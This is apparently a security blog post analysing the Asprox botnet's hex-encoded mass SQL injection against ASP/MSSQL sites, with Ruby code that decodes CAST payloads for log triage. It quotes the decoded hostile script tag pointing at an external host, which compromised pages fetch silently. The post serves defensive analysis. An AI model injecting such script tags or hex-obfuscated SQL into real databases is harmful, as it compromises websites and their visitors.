Mass SQL Injection And Asprox Bot

Asprox is one of the botnets that uses mass SQL injection to inject a malicious *.js script into MSSQL database servers. Normally the Asprox bot searches for any *.asp script that is vulnerable (to SQL injection, of course) and uses it to inject the malicious *.js script and iframe into the database. A typical SQL injection looks similar to the log below:

It’s a little bit annoying to decode all the hex characters. It’s obvious that the SQL injection input is meant to bypass string-based content filtering :). Out of curiosity about this SQL injection, I wrote a little Ruby code to decode it (the normal trick of converting hex input via the cast function). Below are the result, sample usage of the code and sample output:

From the output, we know that the attacker tries to inject <script src=http://www.bannert.ru/ads.js> into the database. This script will later be used as an iframe on the compromised database/web server to silently fetch ads.js. Unfortunately, ads.js was no longer available at the time this blog entry was posted.

Below is the simple Ruby code for decoding the hex values. You need to supply the input within the cast functions.
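As an added example (not the author's original script), here is one way to pull the hex argument out of each cast function in a logged request and decode it for triage. The function name, the sample lines and the Windows-1252 code page for VARCHAR are assumptions made for illustration.

```ruby
require 'uri'

# CAST(0x<hex> AS [N][VAR]CHAR...) as it appears once the log line is URL-decoded.
CAST_RE = /CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(N?)(?:VAR)?CHAR/i

# Returns the decoded text of every hex-encoded CAST argument found in +line+.
def decode_cast_payloads(line)
  text = begin
    URI.decode_www_form_component(line)   # %20 and + become spaces
  rescue ArgumentError
    line                                  # malformed percent-encoding: use the raw line
  end

  text.scan(CAST_RE).map do |hex, wide|
    hex = "0#{hex}" if hex.length.odd?    # SQL Server left-pads odd-length binary literals
    bytes = [hex].pack('H*')
    if wide.empty?
      # VARCHAR: single-byte text; Windows-1252 is an assumption about the code page
      bytes.force_encoding('Windows-1252')
    else
      # NVARCHAR: UTF-16LE; an odd byte count cannot be UTF-16, so drop the last byte
      bytes = bytes.byteslice(0, bytes.bytesize - bytes.bytesize % 2)
      bytes.force_encoding('UTF-16LE')
    end
    bytes.encode('UTF-8', invalid: :replace, undef: :replace)
  end
end

# Constructed sample lines with harmless payloads, not taken from a real log.
SAMPLE_WIDE = 'GET /page.asp id=1;SET%20@S=CAST(0x530045004C0045004300540020003100%20AS%20NVARCHAR(4000))'
SAMPLE_NARROW = 'GET /page.asp id=1;SET @S=CAST(0x53454C4543542032 AS VARCHAR(255))'

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_WIDE, SAMPLE_NARROW].each { |l| puts decode_cast_payloads(l).inspect }
end
```

The same pattern can be run over web server logs to flag requests carrying hex-encoded cast arguments, which a plain string filter would miss.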